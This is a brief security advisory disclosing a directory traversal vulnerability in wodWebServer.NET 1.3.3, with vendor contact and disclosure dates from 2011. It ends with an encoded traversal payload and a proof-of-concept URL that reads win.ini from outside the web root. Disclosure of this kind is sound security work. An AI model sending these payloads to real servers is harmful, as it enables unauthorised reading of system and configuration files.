------------------------------------------------------------------------Software................wodWebServer.NET 1.3.3Vulnerability...........Directory TraversalThreat Level............Serious (3/5)Download................http://www.weonlydo.com/WebServer.NET/web-http-net-server.aspVendor Contact Date.....3/13/2011Disclosure Date.........3/27/2011Tested On...............Windows Vista------------------------------------------------------------------------Author..................AutoSec ToolsSite....................http://www.autosectools.com/Email...................John Leitch <john@autosectools.com>--------------------------------------------------------------------------Description--A directory traversal vulnerability in wodWebServer.NET 1.3.3 can beexploited to read files outside of the web root.--Exploit--..%5C/..%2F/..%2E/..//..//.../../../--PoC--http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows%5C/win.ini